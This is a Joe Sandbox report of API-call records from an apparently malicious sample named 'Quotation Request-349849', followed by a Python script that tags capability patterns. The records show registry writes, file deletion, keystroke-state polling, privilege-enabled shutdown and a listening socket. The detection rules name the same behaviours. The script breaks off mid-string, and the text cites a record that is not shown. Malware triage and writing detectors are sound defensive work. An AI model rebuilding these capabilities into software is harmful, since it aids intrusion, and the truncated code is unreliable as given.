                                                      • Instruction ID: 87006ca3c9dd2d08ea346164f78a38c1cf340468701aa45ffa5f132cf179aacb
                                                      • Opcode Fuzzy Hash: c48c346789ecf3afb5136dc2705b158aba2c5c085c920246fd8fc17c671849df
                                                      • Instruction Fuzzy Hash: 1E31EB72901608ABDB14ABB4DC58AEE77ACFF84361F100175FA14D31A2DB78DA44CF91
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850953
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0085F910,00000000,?,00000000,?,?), ref: 008509C1
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00850A09
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00850A92
                                                      • RegCloseKey.ADVAPI32(?), ref: 00850DB2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00850DBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 7335f93524527879b024d3be37bbd5a28d0c302b13c61542350e16ea654ced49
                                                      • Instruction ID: 2dd7698b2a57bb11a9413bd80bb7e86a79f666c7ee444f7646feb41bbe0fc5e7
                                                      • Opcode Fuzzy Hash: 7335f93524527879b024d3be37bbd5a28d0c302b13c61542350e16ea654ced49
                                                      • Instruction Fuzzy Hash: FE023575600601DFCB14EF28C859A2AB7F5FF89714F048959F99A9B3A2DB34EC05CB81
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0083F113
                                                      • _wcscmp.LIBCMT ref: 0083F128
                                                      • _wcscmp.LIBCMT ref: 0083F13F
                                                        • Part of subcall function 00834385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008343A0
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0083F16E
                                                      • FindClose.KERNEL32(00000000), ref: 0083F179
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0083F195
                                                      • _wcscmp.LIBCMT ref: 0083F1BC
                                                      • _wcscmp.LIBCMT ref: 0083F1D3
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083F1E5
                                                      • SetCurrentDirectoryW.KERNEL32(00888920), ref: 0083F203
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083F20D
                                                      • FindClose.KERNEL32(00000000), ref: 0083F21A
                                                      • FindClose.KERNEL32(00000000), ref: 0083F22C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: febd3aecd20a20282045e3b29d3c71d3f96f8ab35596c6c455a21510f5cde600
                                                      • Instruction ID: 616ce81415e9b0a7d4db7d595de04c2a8a6a1a51cf50ce1daa69ccc98b6e4b92
                                                      • Opcode Fuzzy Hash: febd3aecd20a20282045e3b29d3c71d3f96f8ab35596c6c455a21510f5cde600
                                                      • Instruction Fuzzy Hash: F531A47690021DAADB10AB64EC59EEF77ACFF85361F100175FA10E32A2DB34DA45CAD4
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0083A20F
                                                      • __swprintf.LIBCMT ref: 0083A231
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0083A26E
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0083A293
                                                      • _memset.LIBCMT ref: 0083A2B2
                                                      • _wcsncpy.LIBCMT ref: 0083A2EE
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0083A323
                                                      • CloseHandle.KERNEL32(00000000), ref: 0083A32E
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0083A337
                                                      • CloseHandle.KERNEL32(00000000), ref: 0083A341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: 02f632aa0cf1ba391b061a4f351b900932846f5abcf75f8ff051d5038666b4e5
                                                      • Instruction ID: a527baa65f7d92ce4dd0ea8c0308dd9823a3c206b4c0f9ebe280d74399af3eab
                                                      • Opcode Fuzzy Hash: 02f632aa0cf1ba391b061a4f351b900932846f5abcf75f8ff051d5038666b4e5
                                                      • Instruction Fuzzy Hash: 7D31D2B1900209ABDB21DFA0DC49FEB37BCFF89701F1041B6F608D6261EB7496448B65
                                                      APIs
                                                        • Part of subcall function 00828202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0082821E
                                                        • Part of subcall function 00828202: GetLastError.KERNEL32(?,00827CE2,?,?,?), ref: 00828228
                                                        • Part of subcall function 00828202: GetProcessHeap.KERNEL32(00000008,?,?,00827CE2,?,?,?), ref: 00828237
                                                        • Part of subcall function 00828202: HeapAlloc.KERNEL32(00000000,?,00827CE2,?,?,?), ref: 0082823E
                                                        • Part of subcall function 00828202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00828255
                                                        • Part of subcall function 0082829F: GetProcessHeap.KERNEL32(00000008,00827CF8,00000000,00000000,?,00827CF8,?), ref: 008282AB
                                                        • Part of subcall function 0082829F: HeapAlloc.KERNEL32(00000000,?,00827CF8,?), ref: 008282B2
                                                        • Part of subcall function 0082829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00827CF8,?), ref: 008282C3
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00827D13
                                                      • _memset.LIBCMT ref: 00827D28
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00827D47
                                                      • GetLengthSid.ADVAPI32(?), ref: 00827D58
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00827D95
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00827DB1
                                                      • GetLengthSid.ADVAPI32(?), ref: 00827DCE
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00827DDD
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00827DE4
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00827E05
                                                      • CopySid.ADVAPI32(00000000), ref: 00827E0C
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00827E3D
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00827E63
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00827E77
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
                                                      • Instruction ID: 16158029208b765c815950d9313e075f275e9b699cfe05e1aaa58c802a69f629
                                                      • Opcode Fuzzy Hash: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
                                                      • Instruction Fuzzy Hash: D9618A74900629EFDF00DFA5EC84AEEBBB9FF04701F048169E911E72A1DB349A45CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3c~$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_~
                                                      • API String ID: 0-3820626175
                                                      • Opcode ID: 313b8a5d72cfbeea0e5ff818208b9998bb2af4afc2889185249d16c4510837fb
                                                      • Instruction ID: fee7c67513490f2a8dfe87b84a9ac4182d002c7013cc69c5b6ba29701c238bb7
                                                      • Opcode Fuzzy Hash: 313b8a5d72cfbeea0e5ff818208b9998bb2af4afc2889185249d16c4510837fb
                                                      • Instruction Fuzzy Hash: AD7293B1E01269DBDF14CF59D8847AEB7B5FF58310F24816AE909EB290D7349E81CB90
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00830097
                                                      • SetKeyboardState.USER32(?), ref: 00830102
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00830122
                                                      • GetKeyState.USER32(000000A0), ref: 00830139
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00830168
                                                      • GetKeyState.USER32(000000A1), ref: 00830179
                                                      • GetAsyncKeyState.USER32(00000011), ref: 008301A5
                                                      • GetKeyState.USER32(00000011), ref: 008301B3
                                                      • GetAsyncKeyState.USER32(00000012), ref: 008301DC
                                                      • GetKeyState.USER32(00000012), ref: 008301EA
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00830213
                                                      • GetKeyState.USER32(0000005B), ref: 00830221
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
                                                      • Instruction ID: 410e542e7ade6d6f697ee9a8db9d49e861bfe00cdbecff1c3a2763062b07e135
                                                      • Opcode Fuzzy Hash: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
                                                      • Instruction Fuzzy Hash: E951CD2090478819FB35D7A488747AABFB4FF41380F084599D5C1965C3DAA49B8CCFE2
                                                      APIs
                                                        • Part of subcall function 00850E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008504AC
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0085054B
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008505E3
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00850822
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0085082F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: 14a5e96c4947aead79da77e9032d707b60283fc24d8e73e09ef7561d66e717d6
                                                      • Instruction ID: 13356155da0436155c61bffb0dc690d0b01c464bba3b283b4adc21e0454fb448
                                                      • Opcode Fuzzy Hash: 14a5e96c4947aead79da77e9032d707b60283fc24d8e73e09ef7561d66e717d6
                                                      • Instruction Fuzzy Hash: F3E14C31604214EFCB14DF28C895D2ABBE4FF89715B04856DF94ADB2A2DB34E905CF92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: bbbdbafbdcf117d6c02203d373270266cfe31a81f38dee29179f4e3384027e44
                                                      • Instruction ID: bb8bf19aff4a0b09f8ad637292cd98dc65b72f4f128109dc855e4a300783e532
                                                      • Opcode Fuzzy Hash: bbbdbafbdcf117d6c02203d373270266cfe31a81f38dee29179f4e3384027e44
                                                      • Instruction Fuzzy Hash: A22181752003149FDB11AF64EC09B6E7BA8FF14751F14802AFA46DB2A2DB78AC41CB55
                                                      APIs
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                        • Part of subcall function 00834A31: GetFileAttributesW.KERNEL32(?,0083370B), ref: 00834A32
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 008338A3
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0083394B
                                                      • MoveFileW.KERNEL32(?,?), ref: 0083395E
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0083397B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083399D
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008339B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: 437ae56b4fa1b6309995ebd969151cec7ef944e9acd192dd42acb74f41e97322
                                                      • Instruction ID: 7bb96a48e5a76f89d1bbf848978a08514cbb50b431e910e7ba9a2ec3e8cf8959
                                                      • Opcode Fuzzy Hash: 437ae56b4fa1b6309995ebd969151cec7ef944e9acd192dd42acb74f41e97322
                                                      • Instruction Fuzzy Hash: 4851923180514CEACF05EBA4C9969EDB778FF51301F60406AE806B7291EF356F09CBA1
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0083F440
                                                      • Sleep.KERNEL32(0000000A), ref: 0083F470
                                                      • _wcscmp.LIBCMT ref: 0083F484
                                                      • _wcscmp.LIBCMT ref: 0083F49F
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0083F53D
                                                      • FindClose.KERNEL32(00000000), ref: 0083F553
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 713712311-438819550
                                                      • Opcode ID: 01a97ab714b73e5768d7ea4378830ab8d57ac8cba41e32bce8c6cc63d6f1fbff
                                                      • Instruction ID: 1ed3a47dedefb5ce9949166a2bd05836b44fb29a974eca99325993ee741a5969
                                                      • Opcode Fuzzy Hash: 01a97ab714b73e5768d7ea4378830ab8d57ac8cba41e32bce8c6cc63d6f1fbff
                                                      • Instruction Fuzzy Hash: 1D413971D0421A9FCF14EF68DC59AEEBBB8FF45310F144466E919E2292EB349A44CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID: 3c~$_~
                                                      • API String ID: 674341424-657907094
                                                      • Opcode ID: f6adf87e4152bd9246cf0b495b9431b13866659620a03c315ee8596a01fc3f16
                                                      • Instruction ID: fe285daa37ba2536d71365d07f1c4d4ae4cb433dd568408d096bbf6cbdd03ca4
                                                      • Opcode Fuzzy Hash: f6adf87e4152bd9246cf0b495b9431b13866659620a03c315ee8596a01fc3f16
                                                      • Instruction Fuzzy Hash: 89229A716083809FC724DF14C885BAAB7E8FF89714F10491DF99A97391EB39E944CB92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: f56d1e56b7451f95ab42e45fa70f30304fe05cac0beff4d1408a50fb9834c2b6
                                                      • Instruction ID: 7131b7a2b8f4aa98b62d3ac69d6820684a14c84e5b338bef3eabe5b1ab3688d1
                                                      • Opcode Fuzzy Hash: f56d1e56b7451f95ab42e45fa70f30304fe05cac0beff4d1408a50fb9834c2b6
                                                      • Instruction Fuzzy Hash: F5128A70A00619DFDF04DFA9D985AEEB7F5FF48304F10452AE846E7252EB3AA950CB50
                                                      APIs
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                        • Part of subcall function 00834A31: GetFileAttributesW.KERNEL32(?,0083370B), ref: 00834A32
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00833B89
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00833BD9
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00833BEA
                                                      • FindClose.KERNEL32(00000000), ref: 00833C01
                                                      • FindClose.KERNEL32(00000000), ref: 00833C0A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: 5b7ff5848dec072b41052c2e3d1a80ea17f3130d792ca233fce8e0dcf99874f7
                                                      • Instruction ID: 41ddb009c5e4e6eadc2f02037ed8ffa5b419fadb63987d201118ac2910122a1d
                                                      • Opcode Fuzzy Hash: 5b7ff5848dec072b41052c2e3d1a80ea17f3130d792ca233fce8e0dcf99874f7
                                                      • Instruction Fuzzy Hash: 2F316071008385DFC305EF64D8958AFB7B8BE95314F444D2EF4D592292EB29DA09CBA3
                                                      APIs
                                                        • Part of subcall function 008287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0082882B
                                                        • Part of subcall function 008287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828858
                                                        • Part of subcall function 008287E1: GetLastError.KERNEL32 ref: 00828865
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 008351F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: 79c8a63a198f7ad35e3d21dd6050b7cb12f11f66838f93586886edb4de2a4aca
                                                      • Instruction ID: 3097fdcae59fb5c2071ce8b7732b0105f14344ba73be50e6b83c7bb5d90595db
                                                      • Opcode Fuzzy Hash: 79c8a63a198f7ad35e3d21dd6050b7cb12f11f66838f93586886edb4de2a4aca
                                                      • Instruction Fuzzy Hash: 0C0149317927156BFB287278AC8BFBB72A8FB84345F240421FD23E30D2DA515C0086D1
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008462DC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008462EB
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00846307
                                                      • listen.WSOCK32(00000000,00000005), ref: 00846316
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00846330
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00846344
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 68c8fccbfbfda40b9e9b983e726906ca414e73b8ad839753ff24a8ed496485e1
                                                      • Instruction ID: 9c2cd2dadfd7970564f639dbc403598cc23837a159fec97180ee713acaa10ea3
                                                      • Opcode Fuzzy Hash: 68c8fccbfbfda40b9e9b983e726906ca414e73b8ad839753ff24a8ed496485e1
                                                      • Instruction Fuzzy Hash: 1321D0706002089FCB00EF68C849B6EB7B9FF49721F14416AEA16E73D2D774AC51CB52
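The function records on this page all share one layout: an "APIs" list of `Name.MODULE(args), ref: ADDR` lines (with `Part of subcall function` lines for callees), and a Similarity block whose `String ID` carries the `$`-joined strings the function references. The records for `LookupPrivilegeValueW` / `AdjustTokenPrivileges` / `ExitWindowsEx` with `SeShutdownPrivilege`, for `socket` / `bind` / `listen`, and for `FindFirstFileW` / `DeleteFileW` / `FindNextFileW` with `\*.*` are the kind of API combinations an analyst triages by hand. The following is an added example, not code from the report or from Joe Sandbox: it parses that record layout and maps API combinations (plus referenced strings and the `socket()` address-family/type/protocol arguments) to coarse capability labels. The rule wording and the `SAMPLE_REPORT` text are this example's own constructions; the sample lines themselves are copied from records on this page (the UDP `socket(2,2,0x11)` / `bind` record appears further down).

```python
"""Capability tagging over Joe Sandbox per-function API records (added example; rule labels
and SAMPLE_REPORT are constructed here, the sample lines are copied from this page)."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# "• Name.MODULE(args), ref: ADDR" and "• Part of subcall function X: Name.MODULE ..., ref: ADDR"
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<name>[A-Za-z_][\w:@]*)"
                    r"\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?.*?ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STRING_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
ApiCall = namedtuple("ApiCall", "name module args ref via_subcall")  # via_subcall: "Part of subcall" line


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    def has(self, *apis):
        return {a.lower() for a in apis} <= {c.name.lower() for c in self.calls}

    def has_string(self, s):
        return s.lower() in {x.lower() for x in self.strings}


def parse_records(text):
    """One FunctionRecord per "APIs" header: calls from the APIs section, strings from Similarity."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(current := FunctionRecord())
            section = line
        elif line in SECTION_HEADERS:
            section = line
        elif current and section == "APIs" and (m := API_RE.match(line)):
            current.calls.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"],
                                         "Part of subcall" in line))
        elif current and section == "Similarity" and (m := STRING_RE.match(line)):
            current.strings = [s for s in m["ids"].split("$") if s]  # report joins IDs with '$'
    return records


def socket_kind(rec):
    """Decode socket(af, type, proto) from the printed hex args: (2,1,6) is TCP, (2,2,0x11) is UDP."""
    for c in rec.calls:
        if c.name.lower() == "socket":
            parts = c.args.split(",")[:3]
            if len(parts) == 3 and all(re.fullmatch(r"[0-9A-Fa-f]+", p) for p in parts):
                return {(2, 1, 6): "tcp", (2, 2, 17): "udp"}.get(tuple(int(p, 16) for p in parts))
    return None


RULES = [  # (label, predicate); labels are this example's own wording
    ("shutdown/reboot with SeShutdownPrivilege", lambda r: r.has("LookupPrivilegeValueW",
        "AdjustTokenPrivileges", "ExitWindowsEx") and r.has_string("SeShutdownPrivilege")),
    ("wildcard directory walk with file deletion", lambda r: r.has("FindFirstFileW",
        "FindNextFileW", "DeleteFileW") and r.has_string(r"\*.*")),
    ("TCP listening socket", lambda r: r.has("socket", "bind", "listen") and socket_kind(r) == "tcp"),
    ("UDP socket bound locally", lambda r: r.has("socket", "bind") and socket_kind(r) == "udp"),
]


def tag_report(text):
    """Per record: the ref of its first direct call (a locator back into the report) and matched labels."""
    out = []
    for rec in parse_records(text):
        calls = [c for c in rec.calls if not c.via_subcall] or rec.calls
        out.append((calls[0].ref if calls else "?", [label for label, pred in RULES if pred(rec)]))
    return out


# Constructed sample: lines copied from four records on this page (shutdown, TCP listen, wildcard delete, UDP bind).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 008287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0082882B
  • Part of subcall function 008287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828858
• ExitWindowsEx.USER32(?,00000000), ref: 008351F9
Similarity
• String ID: $@$SeShutdownPrivilege
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008462DC
• bind.WSOCK32(00000000,?,00000010), ref: 00846307
• listen.WSOCK32(00000000,00000005), ref: 00846316
Similarity
• String ID:
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00833B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00833BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00833BEA
Similarity
• String ID: \\*.*
APIs
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0084679E
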